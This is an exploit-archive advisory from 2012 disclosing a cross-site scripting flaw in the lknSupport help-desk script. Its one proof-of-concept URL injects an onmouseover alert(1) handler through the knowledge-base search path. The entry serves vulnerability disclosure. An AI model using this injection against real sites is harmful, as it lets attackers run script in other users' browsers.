id: 17473
date: 02/01/2012
title: lknSupport XSS Vulnerability
author: Mahmood Mokhtari
cves: 

# 
# Title     : lknSupport XSS Vulnerability
# Author    : Red Security TEAM
# Date      : 01/02/2012
# Vendor    : http://www.instantphp.com/store/details/16/lknsupport.html
# demo      : http://www.instantphp.com/demo/lknsupport/
# Tested On : Apache/2.2.21
# Contact   : Info [ 4t ] RedSecurity [ d0t ] COM
# Home      : http://RedSecurity.COM
#
# Exploit   :
# 
# http://server.com/module/kb/search_word/" onmouseover=alert(1) bad=/"/Submit/Search/task/search
#



#  0day.today [2023-03-22]  #